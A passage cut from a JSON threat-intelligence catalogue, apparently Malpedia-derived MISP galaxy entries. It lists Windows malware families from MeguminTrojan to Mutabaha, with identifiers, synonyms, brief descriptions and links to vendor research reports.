"76cd241a-c265-4a33-8ce7-db2d3647b489", "value": "MeguminTrojan" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mekotio", "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/rooty-dolphin-uses-mekotio-to-target-bank-clients-in-south-america-and-europe/", "https://www.welivesecurity.com/2020/08/13/mekotio-these-arent-the-security-updates-youre-looking-for/" ], "synonyms": [], "type": [] }, "uuid": "bfebb298-66e3-4250-82e8-910b7dd8618c", "value": "Mekotio" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.melcoz", "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/" ], "synonyms": [], "type": [] }, "uuid": "e3e289bb-3ac2-4f93-becd-540720501884", "value": "Melcoz" }, { "description": "Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.merlin", "http://lockboxx.blogspot.com/2018/02/intro-to-using-gscript-for-red-teams.html", "http://lockboxx.blogspot.com/2018/02/merlin-for-red-teams.html", "https://github.com/Ne0nd0g/merlin" ], "synonyms": [], "type": [] }, "uuid": "427e4b41-adf6-4d4d-a83f-6d96b5ab4a3e", "value": "Merlin" }, { "description": "Mespinosa is a ransomware which encrypts file using an asymmetric encryption and adds .pysa as file extension. According to dissectingmalware the extension \"pysa\" is probably derived from the Zanzibari Coin with the same name.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mespinoza", "https://dissectingmalwa.re/another-one-for-the-collection-mespinoza-pysa-ransomware.html", "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", "https://www.zdnet.com/article/france-warns-of-new-ransomware-gang-targeting-local-governments/", "https://id-ransomware.blogspot.com/2019/10/mespinoza-ransomware.html", "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", "https://www.cert.ssi.gouv.fr/cti/CERTFR-2020-CTI-002/", "https://twitter.com/campuscodi/status/1347223969984897026" ], "synonyms": [ "pysa" ], "type": [] }, "uuid": "68a7ca8e-2902-43f2-ad23-a77b4c48221d", "value": "Mespinoza" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.metadatabin", "https://id-ransomware.blogspot.com/2020/10/metadata-bin-ransomware.html" ], "synonyms": [ "Ransomware32" ], "type": [] }, "uuid": "750c5b2c-1489-4e11-b21d-c49b651d9227", "value": "MetadataBin Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.metaljack", "https://go.recordedfuture.com/hubfs/reports/cta-2020-1110.pdf", "https://ti.qianxin.com/blog/articles/coronavirus-analysis-of-global-outbreak-related-cyber-attacks/", "https://s.tencent.com/research/report/944.html", "https://www.secrss.com/articles/17900", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://www.fireeye.com/blog/threat-research/2020/04/apt32-targeting-chinese-government-in-covid-19-related-espionage.html", "https://m.threatbook.cn/detail/2527", "https://www.youtube.com/watch?v=ftjDH65kw6E", "https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-1/" ], "synonyms": [ "denesRAT" ], "type": [] }, "uuid": "64304fcc-5bc8-4000-9be2-4fc7a482897a", "value": "METALJACK" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.metamorfo", "https://www.bitdefender.com/files/News/CaseStudies/study/333/Bitdefender-PR-Whitepaper-Metamorfo-creat4500-en-EN-GenericUse.pdf", "https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/metamorfo.md", "https://blog.ensilo.com/metamorfo-avast-abuser", "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-Soucek-Hornak-DemystifyingBankingTrojansFromLatinAmerica.pdf", "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", "https://blog.talosintelligence.com/2018/11/metamorfo-brazilian-campaigns.html", "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html", "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767" ], "synonyms": [ "Casbaneiro" ], "type": [] }, "uuid": "18dc3e7a-600d-4e5f-a283-86156b938530", "value": "Metamorfo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.meterpreter", "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md", "https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf", "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a", "https://cybleinc.com/2020/11/17/oceanlotus-continues-with-its-cyber-espionage-operations/", "https://redcanary.com/blog/getsystem-offsec/", "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf", "https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/", "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", "https://blog.morphisec.com/fin7-attacks-restaurant-industry", "http://schierlm.users.sourceforge.net/avevasion.html", "https://us-cert.cisa.gov/ncas/alerts/aa20-301a" ], "synonyms": [], "type": [] }, "uuid": "13a5c0ae-8e2d-4a38-8b6c-7d746e159991", "value": "Meterpreter (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mewsei" ], "synonyms": [], "type": [] }, "uuid": "48cb12ee-c60a-46cd-b376-39226027c616", "value": "Mewsei" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mgbot", "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/" ], "synonyms": [ "BLame", "MgmBot" ], "type": [] }, "uuid": "d97c2c0c-ef3a-4512-846a-f4cdeee7787a", "value": "MgBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.miancha" ], "synonyms": [], "type": [] }, "uuid": "a3370013-6c47-422e-a4d4-1b86ee71e5e5", "value": "Miancha" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.micrass", "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" ], "synonyms": [], "type": [] }, "uuid": "6c09cc53-7160-47c6-8df8-3e0d42deb5a6", "value": "Micrass" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.microcin", "https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf", "https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia/", "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/", "https://github.com/dlegezo/common", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170759/Microcin_Technical_4PDF_eng_final_s.pdf", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://securelist.com/apt-trends-report-q2-2019/91897/", "https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636/", "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia/", "https://securelist.com/microcin-is-here/97353/" ], "synonyms": [], "type": [] }, "uuid": "185d8b28-0179-4ec6-a3c8-201b1936b9aa", "value": "Microcin" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.micropsia", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/", "http://blog.talosintelligence.com/2017/06/palestine-delphi.html", "https://research.checkpoint.com/apt-attack-middle-east-big-bang/", "https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/micropsia_apt_c_23.md" ], "synonyms": [], "type": [] }, "uuid": "b37f312f-a0b1-41a9-88ae-da2844c19cae", "value": "Micropsia" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mikoponi", "https://www.anomali.com/blog/targeted-ransomware-activity" ], "synonyms": [], "type": [] }, "uuid": "87abb59d-0012-4d45-9e75-136372b25bf8", "value": "Mikoponi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.milkmaid", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "801d8a6a-b7ba-4557-af5d-1005e53145e2", "value": "MILKMAID" }, { "description": "In August 2019, Kaspersky Labs discovered a malware they dubbed Milum (naming based on internal file name fragments) when investigating an operation they named WildPressure. It is written in C++ using STL, primarily to parse JSON. Functionality includes bidirectional file transmission and remote command execution.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.milum", "https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/", "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf" ], "synonyms": [], "type": [] }, "uuid": "d1942959-9c6f-462b-87bf-da6ed914669d", "value": "Milum" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz", "https://blog.xpnsec.com/exploring-mimikatz-part-1/", "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/", "http://www.secureworks.com/research/threat-profiles/gold-kingswood", "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", "https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains", "https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/", "https://www.verfassungsschutz.de/download/broschuere-2021-01-bfv-cyber-brief-2021-01.pdf", "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html", "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://www.ic3.gov/media/news/2020/200917-1.pdf", "https://www.secureworks.com/research/threat-profiles/cobalt-hickman", "https://www.slideshare.net/yurikamuraki5/active-directory-240348605", "https://github.com/gentilkiwi/mimikatz", "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/", "https://labs.f-secure.com/blog/catching-lazarus-threat-intelligence-to-real-detection-logic-part-two", "https://www.f-secure.com/content/dam/f-secure/en/consulting/our-thinking/collaterals/digital/f-secure-consulting-incident-readiness-proactive-response-guide-2020.pdf", "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf", "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf", "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/", "https://twitter.com/swisscom_csirt/status/1354052879158571008", "https://www.secureworks.com/research/threat-profiles/gold-drake", "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf", "https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730", "https://www.secureworks.com/research/threat-profiles/bronze-vinewood", "https://www.crowdstrike.com/blog/credential-theft-mimikatz-techniques/", "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf", "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf", "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", "https://bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf", "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers", "https://www.hvs-consulting.de/lazarus-report/", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", "http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle", "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", "https://www.zdnet.com/article/fbi-says-an-iranian-hacking-group-is-attacking-f5-networking-devices/", "https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html", "https://us-cert.cisa.gov/ncas/alerts/aa20-275a", "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf", "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/", "https://www.matteomalvica.com/blog/2020/01/30/mimikatz-lsass-dump-windg-pykd/", "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions", "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html", "https://ics-cert.kaspersky.com/media/KASPERSKY_Steganography_in_targeted_attacks_EN.pdf", "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east", "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-atlas", "https://www.secureworks.com/research/threat-profiles/tin-woodlawn", "https://www.secureworks.com/research/threat-profiles/gold-kingswood" ], "synonyms": [], "type": [] }, "uuid": "588fb91d-59c6-4667-b299-94676d48b17b", "value": "MimiKatz" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.minebridge", "https://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures", "https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html", "https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/", "https://blog.morphisec.com/minebridge-on-the-rise-sophisticated-delivery-mechanism", "https://www.bleepingcomputer.com/news/security/windows-finger-command-abused-by-phishing-to-download-malware/" ], "synonyms": [ "GazGolder" ], "type": [] }, "uuid": "663d4310-51ea-4ac1-9426-b9e9c5210471", "value": "MINEBRIDGE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.miniasp", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "a4f8bacf-2076-4e00-863c-874cdd833a41", "value": "MiniASP" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.miniduke", "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/", "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/", "https://www.circl.lu/files/tr-14/circl-analysisreport-miniduke-stage3-public.pdf", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://www.fireeye.com/blog/threat-research/2013/02/its-a-kind-of-magic-1.html", "https://www.secureworks.com/research/threat-profiles/iron-hemlock" ], "synonyms": [], "type": [] }, "uuid": "3d164ab8-58a5-433c-bbc9-b81a869ac8c8", "value": "MiniDuke" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirage", "https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf", "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/", "https://www.secureworks.com/research/threat-profiles/bronze-palace", "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf" ], "synonyms": [], "type": [] }, "uuid": "6f6da371-2d62-4245-9aa3-8570e39222ae", "value": "Mirage" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.miragefox", "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/" ], "synonyms": [], "type": [] }, "uuid": "b3e89b03-c5af-41cd-88b8-e15335abbb30", "value": "MirageFox" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirai", "https://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/", "https://www.incapsula.com/blog/new-mirai-variant-ddos-us-college.html", "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", "https://twitter.com/PhysicalDrive0/status/830070569202749440" ], "synonyms": [], "type": [] }, "uuid": "2edd3051-b1b5-47f2-9155-8c97f791dfb7", "value": "Mirai (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.misdat", "https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "d1597713-fe7a-45bd-8b59-1a13c7e097d8", "value": "Misdat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.misfox" ], "synonyms": [ "MixFox", "ModPack" ], "type": [] }, "uuid": "b4c33277-ec15-4bb3-89ef-314ecfa100da", "value": "Misfox" }, { "description": "According to ESET Research, Mispadu is an ambitious Latin American banking trojan that utilizes McDonald’s malvertising and extends its attack surface to web browsers. It is used to target the general public and its main goals are monetary and credential theft. In Brazil, ESET has seen it distributing a malicious Google Chrome extension that attempts to steal credit card data and online banking data, and that compromises the Boleto payment system.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mispadu", "https://www.welivesecurity.com/2019/11/19/mispadu-advertisement-discounted-unhappy-meal/", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/mispadu-banking-trojan-resurfaces" ], "synonyms": [ "URSA" ], "type": [] }, "uuid": "ffc9ffcc-24f4-4e60-ab02-a75b007359fa", "value": "Mispadu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mistyveal", "https://www.epicturla.com/previous-works/hitb2020-voltron-sta" ], "synonyms": [], "type": [] }, "uuid": "d594d6c1-6d10-4fe8-acda-397df91c73ba", "value": "MISTYVEAL" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.miuref" ], "synonyms": [], "type": [] }, "uuid": "4c786624-4a55-46e6-849d-b65552034235", "value": "Miuref" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mm_core" ], "synonyms": [], "type": [] }, "uuid": "6363cc2f-08f1-47a0-adbf-5cf19ea89ffd", "value": "MM Core" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mobi_rat", "https://blog.malwarebytes.com/threat-analysis/2017/07/malware-abusing-ffmpeg/" ], "synonyms": [], "type": [] }, "uuid": "e33aa1f8-a631-4274-afe0-f2fd3426332e", "value": "MobiRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mocton" ], "synonyms": [], "type": [] }, "uuid": "7132c1de-9a3f-4f08-955f-ab6f7a09e17d", "value": "Mocton" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.modpipe", "https://www.welivesecurity.com/2020/11/12/hungry-data-modpipe-backdoor-hits-pos-software-hospitality-sector/" ], "synonyms": [], "type": [] }, "uuid": "a4b3d07a-b3ce-4128-9c5c-caa218518a00", "value": "ModPipe" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.modpos", "https://www.fireeye.com/blog/threat-research/2015/11/modpos.html", "https://twitter.com/physicaldrive0/status/670258429202530306" ], "synonyms": [ "straxbot" ], "type": [] }, "uuid": "026d638b-cc51-4eff-97fc-d61215a1a70a", "value": "ModPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.moker", "https://breakingmalware.com/malware/moker-part-2-capabilities/", "https://blog.malwarebytes.com/threat-analysis/2017/04/elusive-moker-trojan/", "https://breakingmalware.com/malware/moker-part-1-dissecting-a-new-apt-under-the-microscope/", "http://blog.ensilo.com/moker-a-new-apt-discovered-within-a-sensitive-network" ], "synonyms": [], "type": [] }, "uuid": "90a1a61e-3e69-4b92-ac11-9095ac2d9cf4", "value": "Moker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mokes", "https://securelist.com/mokes-and-buerak-distributed-under-the-guise-of-security-certificates/96324/", "https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/" ], "synonyms": [], "type": [] }, "uuid": "3a711d44-2a70-418d-92c1-692c3d3b13c2", "value": "Mokes (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mole", "https://www.proofpoint.com/us/threat-insight/post/adgholas-malvertising-campaign-using-astrum-ek-deliver-mole-ransomware", "https://www.cert.pl/en/news/single/mole-ransomware-analysis-and-decryptor/" ], "synonyms": [], "type": [] }, "uuid": "aaeaf9ee-2f3d-4141-9d45-ec383ba8445f", "value": "Mole" }, { "description": "MoleNet is a .NET downloader malware used by the Molerats group in targeted attacks in the Middle East. Before downloading additional payloads, it first collects information about the infected machine using WMI queries and sends the data to its operators. It was first discovered in 2020, however, Cybereason researchers showed that it has been in use since at least 2019, with infrastructure that operated since 2017. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.molenet", "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign" ], "synonyms": [], "type": [] }, "uuid": "76842aa1-f06d-49cf-90df-158346525f91", "value": "MoleNet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.molerat_loader", "http://www.clearskysec.com/iec/", "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf", "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/" ], "synonyms": [], "type": [] }, "uuid": "b50408c3-6676-4d3f-8a97-9114c215b67a", "value": "Molerat Loader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.monero_miner", "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/", "https://www.welivesecurity.com/2017/09/28/monero-money-mining-malware/" ], "synonyms": [ "CoinMiner" ], "type": [] }, "uuid": "c57a4168-cd09-4611-a665-bbcede80f42b", "value": "Monero Miner" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.montysthree", "https://securelist.com/montysthree-industrial-espionage/98972/" ], "synonyms": [ "MT3" ], "type": [] }, "uuid": "8a6013a1-5e5c-41f5-bd8e-c86ea7f108d9", "value": "MontysThree" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.moonwind", "http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/" ], "synonyms": [], "type": [] }, "uuid": "8465177f-16c8-47fc-a4c8-f4c0409fe460", "value": "MoonWind" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.moriagent", "https://securelist.com/apt-trends-report-q3-2020/99204/", "https://twitter.com/Timele9527/status/1272776776335233024", "https://live.paloaltonetworks.com/t5/custom-signatures/how-to-stop-mortiagent-malware-using-the-snort-rule/td-p/326590#" ], "synonyms": [], "type": [] }, "uuid": "3de9ccf5-4756-4c5b-9086-6664f5a9b761", "value": "MoriAgent" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.morphine" ], "synonyms": [], "type": [] }, "uuid": "9de41613-7762-4a88-8e9a-4e621a127f32", "value": "Morphine" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.morto", "http://contagiodump.blogspot.com/2011/08/aug-28-morto-tsclient-rdp-worm-with.html", "https://www.f-secure.com/weblog/archives/00002227.html", "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Morto.A" ], "synonyms": [], "type": [] }, "uuid": "c931dc7d-9373-4545-911c-ad5589670c40", "value": "Morto" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mosquito", "https://www.recordedfuture.com/turla-apt-infrastructure/", "https://www.secureworks.com/research/threat-profiles/iron-hunter", "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/", "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf", "https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/" ], "synonyms": [], "type": [] }, "uuid": "663df641-d396-4e93-93bd-bb9609ceb0ba", "value": "Mosquito" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mount_locker", "https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://www.bleepingcomputer.com/news/security/mount-locker-ransomware-joins-the-multi-million-dollar-ransom-game/", "https://www.bleepingcomputer.com/news/security/mount-locker-ransomware-now-targets-your-turbotax-tax-returns/", "https://www.bleepingcomputer.com/news/security/biotech-research-firm-miltenyi-biotec-hit-by-ransomware-data-leaked/", "https://dissectingmalwa.re/between-a-rock-and-a-hard-place-exploring-mount-locker-ransomware.html" ], "synonyms": [], "type": [] }, "uuid": "b5814e05-532a-4262-a8da-82fd0d7605ee", "value": "Mount Locker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.moure" ], "synonyms": [], "type": [] }, "uuid": "bd3468e4-5e00-46e6-a884-6eda1b246394", "value": "Moure" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mozart", "https://securitykitten.github.io/2015/01/11/the-mozart-ram-scraper.html" ], "synonyms": [], "type": [] }, "uuid": "dde61acb-8c0f-4a3a-8450-96e233f2ddc1", "value": "mozart" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mpkbot", "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" ], "synonyms": [ "MPK" ], "type": [] }, "uuid": "2363dc9f-822a-4581-8d5f-1fc436e70621", "value": "MPKBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mrdec", "https://dissectingmalwa.re/i-literally-cant-think-of-a-fitting-pun-mrdec-ransomware.html" ], "synonyms": [], "type": [] }, "uuid": "1e301d67-cd12-4f46-bcb3-c60f9b78c4d0", "value": "MrDec Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mr_peter", "https://github.com/mrfr05t/Mr.Peter" ], "synonyms": [], "type": [] }, "uuid": "677123aa-3a1a-4443-a968-4f6f4bc6b3c2", "value": "MrPeter" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.multigrain_pos", "https://www.pandasecurity.com/mediacenter/malware/multigrain-malware-pos/", "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html" ], "synonyms": [], "type": [] }, "uuid": "c513c490-7c76-42ab-a51f-cc780faa7146", "value": "Multigrain POS" }, { "description": " a command-line reconnaissance tool. It can be used to execute files as a different user, move, and delete files locally, schedule remote AT jobs, perform host discovery on connected networks, scan for open ports on hosts in a connected network, and retrieve information about the OS, users, groups, and shares on remote hosts.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.murkytop", "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", "https://www.secureworks.com/research/threat-profiles/bronze-mohawk" ], "synonyms": [], "type": [] }, "uuid": "2685ea45-06f4-46e0-9397-eff8844db855", "value": "murkytop" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.murofet", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf" ], "synonyms": [], "type": [] }, "uuid": "f7081626-130a-48d5-83a9-759b3ef198ec", "value": "Murofet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mutabaha", "http://vms.drweb.ru/virus/?_is=1&i=8477920" ], "synonyms": [], "type": [] }, "uuid": 